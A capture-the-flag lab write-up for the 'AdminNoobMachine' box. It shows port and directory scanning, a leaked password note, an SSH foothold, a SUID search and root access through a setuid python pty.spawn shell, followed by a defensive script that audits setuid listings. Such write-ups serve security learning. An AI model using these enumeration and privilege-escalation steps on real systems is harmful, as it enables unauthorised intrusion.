AdminNoobMachine

IP: 10.0.0.13

Enumeration

# nmap -sC -sV -v -Pn 10.0.0.13
..............................
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Hacker Secutiry
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34602/udp   status
|   100024  1          36685/udp6  status
|   100024  1          51734/tcp   status
|_  100024  1          54568/tcp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# gobuster dir -e -u http://10.0.0.13 -w /usr/share/dirb/wordlists/big.txt 
===============================================================
http://10.0.0.13/.htaccess            (Status: 403) [Size: 293]
http://10.0.0.13/.htpasswd            (Status: 403) [Size: 293]
http://10.0.0.13/LICENSE              (Status: 200) [Size: 1093]
http://10.0.0.13/admin                (Status: 301) [Size: 306] [--> http://10.0.0.13/admin/]
http://10.0.0.13/css                  (Status: 301) [Size: 304] [--> http://10.0.0.13/css/]  
http://10.0.0.13/img                  (Status: 301) [Size: 304] [--> http://10.0.0.13/img/]  
http://10.0.0.13/js                   (Status: 301) [Size: 303] [--> http://10.0.0.13/js/]   
http://10.0.0.13/mail                 (Status: 301) [Size: 305] [--> http://10.0.0.13/mail/] 
http://10.0.0.13/manual               (Status: 301) [Size: 307] [--> http://10.0.0.13/manual/]
http://10.0.0.13/server-status        (Status: 403) [Size: 297]                               
http://10.0.0.13/vendor               (Status: 301) [Size: 307] [--> http://10.0.0.13/vendor/]

http://10.0.0.13/admin/temp.txt
Anotacoes : Eu preciso trocar a minha senha hsecpwd123 , ja faz tempo que utilizo ela.

Exploitation

hsec@noob1:~$ id
uid=1000(hsec) gid=1000(hsec) groups=1000(hsec)
hsec@noob1:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 8.10 (jessie)
Release:	8.10
Codename:	jessie
hsec@noob1:~$ uname -a
Linux noob1 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux

So we have Debian 8.10 with kernel 3.16.0.

Post-exploitation

Let's look for executables (setuid/setgid binaries) that might run with root privileges:

hsec@noob1:/$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 106908 Mar 23  2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount

Note that python is setuid root (and world-writable on top of that), so all it takes is:

hsec@noob1:/$ python -c "import pty; pty.spawn(\"/bin/sh\")" 
# id
uid=1000(hsec) gid=1000(hsec) euid=0(root) groups=1000(hsec)
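As an added defender-side check (not part of the original writeup), this Python script parses "ls -ld" lines like the listing above and flags the two conditions that made this box fall: a setuid-root binary writable by others, and a setuid interpreter. The embedded listing is constructed from the output above, and the severity labels and INTERPRETERS set are my own choices.

```python
import re

# Sample listing constructed from the find / ls -ld output shown above (not live data).
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 106908 Mar 23  2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwxr-xr-x 1 root root 1029624 Mar 14  2015 /bin/bash
"""

# Interpreters and shells: setuid on any of these hands root to whoever can run them.
INTERPRETERS = {"python", "perl", "ruby", "awk", "mawk", "gawk", "sh", "bash",
                "dash", "lua", "php", "node"}

# Fields: mode, link count, owner, group, size, month, day, year-or-time, path
LINE_RE = re.compile(
    r"^(?P<mode>[-dlbcps][-rwxsStT]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$")

def classify(mode, owner, path):
    """Return (severity, reason) for one ls -ld line, or None if not setuid/setgid."""
    setuid = mode[3] in "sS"
    setgid = mode[6] in "sS"
    if not (setuid or setgid):
        return None
    writable_by_others = mode[5] == "w" or mode[8] == "w"   # group or world write bit
    base = path.rsplit("/", 1)[-1]
    name = re.sub(r"[\d.]+$", "", base)   # python2.7 -> python, perl5.20 -> perl
    if setuid and owner == "root" and writable_by_others:
        return ("critical", "setuid root and writable by group/others; fix: chmod u-s,go-w %s" % path)
    if name in INTERPRETERS:
        return ("high", "setuid/setgid interpreter or shell (%s); fix: chmod ug-s %s" % (name, path))
    return ("info", "setuid/setgid binary; compare against the package baseline (dpkg -V)")

def audit_setuid_listing(text):
    """Parse ls -ld lines and return [(path, severity, reason)] for each setuid/setgid entry."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        verdict = classify(m.group("mode"), m.group("owner"), m.group("path"))
        if verdict:
            findings.append((m.group("path"), verdict[0], verdict[1]))
    return findings

if __name__ == "__main__":
    for path, severity, reason in audit_setuid_listing(SAMPLE_LISTING):
        print("%-9s %-22s %s" % (severity, path, reason))
```

On a live host, feed it the output of the same find command from the writeup (piped through the script on stdin, or saved to a file) and review every "critical" and "high" hit before touching the "info" entries, which are usually distro defaults.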
